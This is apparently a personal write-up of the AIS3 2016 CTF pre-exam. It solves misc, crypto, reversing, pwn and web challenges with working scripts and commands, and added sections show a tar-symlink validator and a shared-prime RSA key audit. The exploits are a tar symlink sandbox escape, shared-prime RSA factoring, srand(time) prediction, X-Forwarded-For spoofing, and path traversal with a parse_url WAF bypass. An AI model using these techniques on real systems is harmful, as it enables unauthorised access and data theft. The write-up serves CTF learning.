Just Do it

Dreams don't run away; the one who runs away is always yourself.

AIS3 pre-exam 2016 partial write-up

Preface:
I think I started touching security around this time last year,
but I didn't make it into AIS3 last year; back then I hadn't even heard of a buffer overflow @@
This past year I've been playing on and off, in between running off to play with drones, reading AI,
going off to read ACM books...
I really feel useless - - , so many things done in fits and starts...
Solved 11 problems in total, no idea whether I'll get in @@

Misc

01

Just read the file directly:
ais3{2016_^_^_hello_world!}

02

You're given a 7z that has to be patched (7Z -> 7z); inside are two files, one of them encrypted,
and the password is the other file's filename, so just keep repeating the process

import os
import subprocess

# Each round: find the remaining archive, fix its magic bytes (7Z -> 7z),
# read the password from secret.txt, extract the next layer, and repeat.
for i in range(1000):
    # the archive is whatever is left besides secret.txt, this script and temp.txt
    others = [n for n in os.listdir('.') if n not in ('secret.txt', '1.py', 'temp.txt')]
    if not others:
        break
    fname = others[0]

    # patch byte 1: '7Z' -> '7z' so 7z accepts the file
    with open(fname, 'r+b') as f:
        f.seek(1)
        f.write(b'z')

    with open('secret.txt') as f:
        secret = f.read().strip('\n')

    # keep a copy of each password, then extract with it (argument list: no shell quoting issues)
    os.system('cat secret.txt > ../old')
    os.remove('secret.txt')
    subprocess.call(['7z', 'x', '-p' + secret, fname])
    os.remove(fname)

03

Preface:
Because I didn't know how to pass the value in, I was stuck for 5 or 6 hours...

A quick rundown of the program

First it reads a number (ends at \n)

Then it reads data using that number as the size (ends at EOF, or as soon as the size is met)

The data passed in has to be a tar, otherwise it errors

And the tar has to contain a guess.txt

guess.txt has to be a symbolic link pointing to flag.txt

Process:

$ ln -s ../flag.txt guess.txt
$ tar -cvf a.tar guess.txt
$ wc a.tar ## size is 10240; it has to be less than 65536
$ echo 10240 > size.txt

$ xxd -p a.tar > data

That's it

root@sol:/tmp/s# ( cat size.txt ; xxd -r -p data ) | nc quiz.ais3.org 9150
ais3{First t1me 1$sc4pe tHE S4nd80x}
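The defender-side counterpart of the escape above, as an added example that is not part of the original write-up: it builds a tar in memory containing the same guess.txt -> ../flag.txt symlink (and a traversal name) and shows the validation a sandbox should run before extracting anything. The root path /sandbox/upload is an assumed placeholder and nothing is written to disk.

```python
import io
import os
import tarfile

def build_tar(files=(), symlinks=()) -> bytes:
    """Construct a tar in memory (test input only).
    files: (name, data); symlinks: (name, target), e.g. ("guess.txt", "../flag.txt")."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        for name, target in symlinks:
            info = tarfile.TarInfo(name)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tar.addfile(info)
    return buf.getvalue()

def _inside(root: str, path: str) -> bool:
    """True if `path` (after resolving '..' and existing symlinks) stays under root."""
    return os.path.commonpath([root, os.path.realpath(path)]) == root

def unsafe_members(data: bytes, root: str) -> list:
    """Names a sandbox must refuse before extracting under `root`:
    member names that escape the root, and symlinks whose target resolves
    outside it (exactly the guess.txt -> ../flag.txt trick)."""
    root = os.path.realpath(root)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for m in tar.getmembers():
            dest = os.path.join(root, m.name)
            if not _inside(root, dest):
                bad.append(m.name)
            elif m.issym() and not _inside(root, os.path.join(os.path.dirname(dest), m.linkname)):
                bad.append(m.name)
    return bad

if __name__ == "__main__":
    evil = build_tar(symlinks=[("guess.txt", "../flag.txt")])
    print(unsafe_members(evil, "/sandbox/upload"))   # ['guess.txt']
```

Python 3.12's tarfile (backported to 3.8.17, 3.9.17, 3.10.12 and 3.11.4) ships the same policy built in as extractall(filter="data"), which rejects links and names that escape the destination.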

Crypto

I didn't solve the second one; at a glance it looked like an LEA hole, but I only opened the Crypto problems on the evening of the third day,
and after finishing the third one I didn't feel like it any more; the third one was a bit annoying = =

01

At first, before any hint, I figured it was XOR

but just running xortool -c 20 ./crypto1

gave nothing

On the third day I read a few write-ups

and changed it to xortool -c 20 -m 257 ./crypto1

1 possible key(s) of length 39:
ais3{XoR_enCrYPtiON_15_n0t_a_G00d_i!ea}
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv

So the problem was that the key lengths tried by default are too short; asking for longer ones is all it takes...

But submitting that as-is is wrong

I looked up the plaintext online, compared, and corrected it to

ais3{XoR_enCrYPtiON_15_n0t_a_G00d_idea}

03

This one gives you a lot of public keys

Roughly the idea is
Suppose:
p,q : 3 x 5 = n1
p,q : 3 x 11 = n2

then gcd(n1,n2) = 3 = p

and from that you can derive q (n / p)

whereas if gcd(n1,n2) == 1

it means there is no shared p

Main reference:
backdoor CTF 2015: RSALOT


A pile of junk public keys... and because flag.enc was encrypted without padding,

you also have to add -raw or it errors = = ; damn, this is where I got stuck the longest... a trap

Trying up to 10.pub produced the answer

ais3{Euc1id3an_a1g0ri7hm_i5_u53fu1}




import os
from Crypto.PublicKey import RSA
from gmpy2 import gcd, invert

keys = {}

# Load every N.pub in the current directory, keyed by its number N.
filenames = next(os.walk("."))[2]
for filename in filenames:
    if filename.endswith(".pub"):
        with open(filename, 'rb') as f:
            externKey = f.read()
        keys[int(filename[:-4])] = RSA.importKey(externKey)


Since the code was written in bits and pieces I'm not attaching it...
In the end, "manual intelligence"...

p = int(gcd(keys[4].n, keys[10].n))   # the prime shared by 4.pub and 10.pub
q = keys[10].n // p
n = keys[10].n
e = keys[10].e
phi_n = (q - 1) * (p - 1)
d = int(invert(e, phi_n))

# rsatool.py (external tool) rebuilds a PEM private key from p, q and e
os.system('python rsatool.py -p ' + str(p) + ' -q ' + str(q) + ' -e ' + str(e) + ' -o priv.key')

# flag.enc was encrypted without padding, hence -raw
os.system("openssl rsautl -in flag.enc -inkey priv.key -decrypt -raw")
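The shared-prime check described above, as an added example that is not the author's script: a pairwise-GCD pass over a constructed set of toy moduli (small primes, labelled as such), recovery of d from the shared p, and a raw (unpadded) RSA round trip to confirm it, which is the mode the challenge used. The same pass is how a key custodian audits a fleet of public keys for primes reused because of poor entropy at generation time.

```python
from math import gcd

# Constructed toy key set: small primes so it runs instantly; the method is
# identical for 2048-bit keys. Keys 1 and 3 were "generated" with the same prime P.
P, Q1, Q2, R1, R2 = 1000003, 1000033, 1000037, 1000039, 1000081
E = 65537
MODULI = {1: P * Q1, 2: R1 * R2, 3: P * Q2}   # key id -> n (ids mimic 1.pub, 2.pub, ...)

def shared_factor_pairs(moduli: dict) -> list:
    """[(id_a, id_b, g)] for every pair of moduli with gcd g > 1.
    gcd == 1 means the two keys share no prime, as the write-up notes."""
    ids = sorted(moduli)
    hits = []
    for i, a in enumerate(ids):
        for b in ids[i + 1:]:
            g = gcd(moduli[a], moduli[b])
            if g != 1:
                hits.append((a, b, g))
    return hits

def private_exponent(n: int, e: int, p: int) -> int:
    """Rebuild d from one known prime: q = n / p, phi = (p-1)(q-1), d = e^-1 mod phi."""
    q = n // p
    if p * q != n:
        raise ValueError("p does not divide n")
    return pow(e, -1, (p - 1) * (q - 1))     # modular inverse, Python 3.8+

def recover_and_check(moduli: dict, e: int, message: int) -> tuple:
    """Factor the first weak key found, then prove d is right by round-tripping
    a textbook (unpadded) RSA encryption of `message`."""
    a, b, p = shared_factor_pairs(moduli)[0]
    n = moduli[b]
    d = private_exponent(n, e, p)
    c = pow(message, e, n)
    return b, p, pow(c, d, n) == message

if __name__ == "__main__":
    print(recover_and_check(MODULI, E, 0x41424344))   # (3, 1000003, True)
```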

Binary

Didn't solve the third one; one look at that IDA Pro screen full of code and I gave up

01

# Per position i: x = ord(c) ^ i, rotate x left by s = (i ^ 9) & 3 bits (8-bit rotate),
# add 8, keep the low byte. Brute-force each position over printable characters.
from string import printable

cipher = [0xca, 0x70, 0x93, 0xc8, 0x06,
          0x7f, 0x23, 0xa1, 0xe0, 0x48,
          0x2a, 0x39, 0xae, 0x54, 0xf2,
          0x79, 0xf2, 0x84, 0x8b, 0x05,
          0xa2, 0x52, 0x19, 0x29, 0xc4,
          0x54, 0xaa, 0xf0, 0xca]

def rol8(x, s):
    return ((x << s) | (x >> (8 - s))) & 0xff

def encode_byte(c, i):
    return (rol8(ord(c) ^ i, (i ^ 9) & 3) + 8) & 0xff

flag = ''
for i, target in enumerate(cipher):
    for c in printable:
        if encode_byte(c, i) == target:
            flag += c
            break
print(flag)

02




This one is x64 shellcode

I first did
$ ipython
from pwn import *
print disasm('H\xb8E YOU~?}PH\xb8WHERE ARPH\xb8NOTFLAG{PH\x89\xe6H1\xd2\xb0\x8c0\xc8\x88\x04\x16H\xff\xc2\xb0\x840\xc8\x88\x04\x16H\xff\xc2\xb0\x9e0\xc8\x88\x04\x16H\xff\xc2\xb0\xde0\xc8\x88\x04\x16H\xff\xc2\xb0\x960\xc8\x88\x04\x16H\xff\xc2\xb0\x950\xc8\x88\x04\x16H\xff\xc2\xb0\xd50\xc8\x88\x04\x16H\xff\xc2\xb0\xdb0\xc8\x88\x04\x16H\xff\xc2\xb0\xb20\xc8\x88\x04\x16H\xff\xc2\xb0\xdb0\xc8\x88\x04\x16H\xff\xc2\xb0\xd90\xc8\x88\x04\x16H\xff\xc2\xb0\xcd0\xc8\x88\x04\x16H\xff\xc2\xb0\x9f0\xc8\x88\x04\x16H\xff\xc2\xb0\x880\xc8\x88\x04\x16H\xff\xc2\xb0\x9b0\xc8\x88\x04\x16H\xff\xc2\xb0\x880\xc8\x88\x04\x16H\xff\xc2\xb0\x9f0\xc8\x88\x04\x16H\xff\xc2\xb0\x9e0\xc8\x88\x04\x16H\xff\xc2\xb0\x880\xc8\x88\x04\x16H\xff\xc2\xb0\xcd0\xc8\x88\x04\x16H\xff\xc2\xb0\x940\xc8\x88\x04\x16H\xff\xc2\xb0\x820\xc8\x88\x04\x16H\xff\xc2\xb0\x930\xc8\x88\x04\x16H\xff\xc2\xb0\x900\xc8\x88\x04\x16H\xff\xc2j<XH1\xff\x0f\x05')
   0:   48                      dec    eax
   1:   b8 45 20 59 4f          mov    eax,0x4f592045
   6:   55                      push   ebp
   7:   7e 3f                   jle    0x48
   9:   7d 50                   jge    0x5b
   b:   48                      dec    eax
   c:   b8 57 48 45 52          mov    eax,0x52454857
  11:   45                      inc    ebp
  12:   20 41 52                and    BYTE PTR [ecx+0x52],al
  15:   50                      push   eax
  16:   48                      dec    eax
  17:   b8 4e 4f 54 46          mov    eax,0x46544f4e
  1c:   4c                      dec    esp
  1d:   41                      inc    ecx
  1e:   47                      inc    edi
  1f:   7b 50                   jnp    0x71
  21:   48                      dec    eax
  22:   89 e6                   mov    esi,esp
  24:   48                      dec    eax
  25:   31 d2                   xor    edx,edx
  27:   b0 8c                   mov    al,0x8c
  29:   30 c8                   xor    al,cl
  2b:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  2e:   48                      dec    eax
  2f:   ff c2                   inc    edx
  31:   b0 84                   mov    al,0x84
  33:   30 c8                   xor    al,cl
  35:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  38:   48                      dec    eax
  39:   ff c2                   inc    edx
  3b:   b0 9e                   mov    al,0x9e
  3d:   30 c8                   xor    al,cl
  3f:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  42:   48                      dec    eax
  43:   ff c2                   inc    edx
  45:   b0 de                   mov    al,0xde
  47:   30 c8                   xor    al,cl
  49:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  4c:   48                      dec    eax
  4d:   ff c2                   inc    edx
  4f:   b0 96                   mov    al,0x96
  51:   30 c8                   xor    al,cl
  53:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  56:   48                      dec    eax
  57:   ff c2                   inc    edx
  59:   b0 95                   mov    al,0x95
  5b:   30 c8                   xor    al,cl
  5d:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  60:   48                      dec    eax
  61:   ff c2                   inc    edx
  63:   b0 d5                   mov    al,0xd5
  65:   30 c8                   xor    al,cl
  67:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  6a:   48                      dec    eax
  6b:   ff c2                   inc    edx
  6d:   b0 db                   mov    al,0xdb
  6f:   30 c8                   xor    al,cl
  71:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  74:   48                      dec    eax
  75:   ff c2                   inc    edx
  77:   b0 b2                   mov    al,0xb2
  79:   30 c8                   xor    al,cl
  7b:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  7e:   48                      dec    eax
  7f:   ff c2                   inc    edx
  81:   b0 db                   mov    al,0xdb
  83:   30 c8                   xor    al,cl
  85:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  88:   48                      dec    eax
  89:   ff c2                   inc    edx
  8b:   b0 d9                   mov    al,0xd9
  8d:   30 c8                   xor    al,cl
  8f:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  92:   48                      dec    eax
  93:   ff c2                   inc    edx
  95:   b0 cd                   mov    al,0xcd
  97:   30 c8                   xor    al,cl
  99:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  9c:   48                      dec    eax
  9d:   ff c2                   inc    edx
  9f:   b0 9f                   mov    al,0x9f
  a1:   30 c8                   xor    al,cl
  a3:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  a6:   48                      dec    eax
  a7:   ff c2                   inc    edx
  a9:   b0 88                   mov    al,0x88
  ab:   30 c8                   xor    al,cl
  ad:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  b0:   48                      dec    eax
  b1:   ff c2                   inc    edx
  b3:   b0 9b                   mov    al,0x9b
  b5:   30 c8                   xor    al,cl
  b7:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  ba:   48                      dec    eax
  bb:   ff c2                   inc    edx
  bd:   b0 88                   mov    al,0x88
  bf:   30 c8                   xor    al,cl
  c1:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  c4:   48                      dec    eax
  c5:   ff c2                   inc    edx
  c7:   b0 9f                   mov    al,0x9f
  c9:   30 c8                   xor    al,cl
  cb:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  ce:   48                      dec    eax
  cf:   ff c2                   inc    edx
  d1:   b0 9e                   mov    al,0x9e
  d3:   30 c8                   xor    al,cl
  d5:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  d8:   48                      dec    eax
  d9:   ff c2                   inc    edx
  db:   b0 88                   mov    al,0x88
  dd:   30 c8                   xor    al,cl
  df:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  e2:   48                      dec    eax
  e3:   ff c2                   inc    edx
  e5:   b0 cd                   mov    al,0xcd
  e7:   30 c8                   xor    al,cl
  e9:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  ec:   48                      dec    eax
  ed:   ff c2                   inc    edx
  ef:   b0 94                   mov    al,0x94
  f1:   30 c8                   xor    al,cl
  f3:   88 04 16                mov    BYTE PTR [esi+edx*1],al
  f6:   48                      dec    eax
  f7:   ff c2                   inc    edx
  f9:   b0 82                   mov    al,0x82
  fb:   30 c8                   xor    al,cl
  fd:   88 04 16                mov    BYTE PTR [esi+edx*1],al
 100:   48                      dec    eax
 101:   ff c2                   inc    edx
 103:   b0 93                   mov    al,0x93
 105:   30 c8                   xor    al,cl
 107:   88 04 16                mov    BYTE PTR [esi+edx*1],al
 10a:   48                      dec    eax
 10b:   ff c2                   inc    edx
 10d:   b0 90                   mov    al,0x90
 10f:   30 c8                   xor    al,cl
 111:   88 04 16                mov    BYTE PTR [esi+edx*1],al
 114:   48                      dec    eax
 115:   ff c2                   inc    edx
 117:   6a 3c                   push   0x3c
 119:   58                      pop    eax
 11a:   48                      dec    eax
 11b:   31 ff                   xor    edi,edi
 11d:   0f 05                   syscall


At first I thought it was the same as last year, but it kept segfaulting and I was stuck for a long time

so I just read the assembly directly = =

Since the flag must end in } and the last stored byte is \x90,

'\x90' xor '}' = '\xed', so we know cl = \xed

After that, xor every byte with \xed and that's the answer


# Every stored byte was produced by `xor al, cl`; cl was deduced to be 0xed
# from the fact that the last plaintext byte must be '}'.
cipher = [0x8c, 0x84, 0x9e, 0xde, 0x96, 0x95, 0xd5,
          0xdb, 0xb2, 0xdb, 0xd9, 0xcd, 0x9f, 0x88,
          0x9b, 0x88, 0x9f, 0x9e, 0x88, 0xcd, 0x94,
          0x82, 0x93, 0x90]
cl = 0xed
print(''.join(chr(c ^ cl) for c in cipher))


$ python decoder.py
ais3{x86_64 reverse yo~}
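An added example (not the author's decoder) that works from the shellcode bytes themselves instead of a hand-copied list: it scans for the `mov al, imm8 ; xor al, cl ; mov [rsi+rdx], al` stub, recovers cl by requiring the decoded text to be printable and end in `}`, and decodes. The listing above was produced in pwntools' default i386 mode, which is why every 0x48 REX.W prefix shows up as `dec eax`; the bytes are unaffected, so scanning them directly sidesteps that. The hex below is transcribed from the disasm() call above.

```python
import re

# Shellcode from the disasm() call, as hex (constructed here from the page's bytes).
SHELLCODE = bytes.fromhex(
    "48b84520594f557e3f7d50"      # mov rax, "E YOU~?}" ; push rax
    "48b8574845524520415250"      # mov rax, "WHERE AR" ; push rax
    "48b84e4f54464c41477b50"      # mov rax, "NOTFLAG{" ; push rax
    "4889e64831d2"                # mov rsi, rsp ; xor rdx, rdx
    # 24 stubs: mov al, imm8 ; xor al, cl ; mov [rsi+rdx], al ; inc rdx
    "b08c30c888041648ffc2b08430c888041648ffc2b09e30c888041648ffc2"
    "b0de30c888041648ffc2b09630c888041648ffc2b09530c888041648ffc2"
    "b0d530c888041648ffc2b0db30c888041648ffc2b0b230c888041648ffc2"
    "b0db30c888041648ffc2b0d930c888041648ffc2b0cd30c888041648ffc2"
    "b09f30c888041648ffc2b08830c888041648ffc2b09b30c888041648ffc2"
    "b08830c888041648ffc2b09f30c888041648ffc2b09e30c888041648ffc2"
    "b08830c888041648ffc2b0cd30c888041648ffc2b09430c888041648ffc2"
    "b08230c888041648ffc2b09330c888041648ffc2b09030c888041648ffc2"
    "6a3c584831ff0f05"            # push 60 ; pop rax ; xor rdi, rdi ; syscall (exit)
)

# b0 XX 30 c8 88 04 16  ==  mov al, XX ; xor al, cl ; mov [rsi+rdx], al
STUB = re.compile(rb"\xb0(.)\x30\xc8\x88\x04\x16", re.DOTALL)

def stored_bytes(code: bytes) -> list:
    """The imm8 of every stub, in program order (the bytes xored with cl)."""
    return [m[0] for m in STUB.findall(code)]

def candidate_keys(cipher, crib_end=b"}") -> list:
    """Single-byte keys whose decryption is printable ASCII and ends with the crib."""
    keys = []
    for k in range(256):
        plain = bytes(c ^ k for c in cipher)
        if plain.endswith(crib_end) and all(0x20 <= b < 0x7f for b in plain):
            keys.append(k)
    return keys

def decode(code: bytes) -> tuple:
    cipher = stored_bytes(code)
    key = candidate_keys(cipher)[0]          # the write-up's cl = 0xed
    return key, bytes(c ^ key for c in cipher).decode("ascii")

if __name__ == "__main__":
    print("cl = 0x%02x, text = %r" % decode(SHELLCODE))
```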


Remote

I haven't touched pwn much and only solved the first one; one look in IDA Pro and I figured it was testing srand(time(0)), roughly;
took some existing code, tweaked the time, and it passed

01

from pwn import *
from ctypes import CDLL, c_long

x = 0x2016a153

# Reproduce the server's srand(time(0)); rand() locally through the C library.
libc = CDLL('libc.so.6')
libc.time.restype = c_long
libc.srand(libc.time(None))
a = libc.rand()

r = remote('quiz.ais3.org', 2154)
#r = process('./remote1')
print(r.recv())
r.sendline(str(a ^ x).encode())
print(r.recv())


[+] Opening connection to quiz.ais3.org on port 2154: Done
Enter passcode: 
Correct!
ais3{sEEd_is_cRiTiCaL_@_@}

[*] Closed connection to quiz.ais3.org port 2154

web

01

The mandatory web wargame problem, where they say something like "Google can't find it"

It's testing robots.txt

ais3{Y0u_beat_the_G00g1e!!}

02

curl --header "X-Forwarded-For: 127.0.0.1" "https://quiz.ais3.org:8012/panel.php"

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Admin Panel</title>
</head>
<body>
Admin's secret is: ais3{admin's_pane1_is_on_fir3!!!!!}</body>
</html>

03

view-source:https://quiz.ais3.org:8013///download.php?p=../

Append XXX.php after it to see that file's contents

view-source:https://quiz.ais3.org:8013///download.php?p=../waf.php

You can see what the filter does


<?php

include "you_should_not_pass.php";

# general WAF
function waf()
{
    $keywords = [
        "union",
        "select",
        "insert",
        "where",
        "update",
        "order",
        # danger!!!!
        "flag",
    ];

    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                bad();
            if (stristr($v, $token))
                bad();
        }
    }
}

waf();



The hole is in parse_url: with the request URI starting in ///, parse_url() returns false, so $uri['query'] is empty and the WAF loops over nothing, while download.php still reads p from $_GET.

Reference: https://zeta-two.com/ctf/2015/10/04/sectctf-writeup.html

Request this URL:
view-source:https://quiz.ais3.org:8013///download.php?p=../flag.php


Ha! Ha! You can not see the content of this file, because it is PHP!!! :)

<?php
$flag = "CTF{haha!i_bypassed_the_fucking_waf!}";
?>

Answer:
ais3{haha!i_bypassed_the_fucking_waf!}

Honestly this is one I shouldn't have been able to solve; it felt like a slap in the face, a sudden awakening...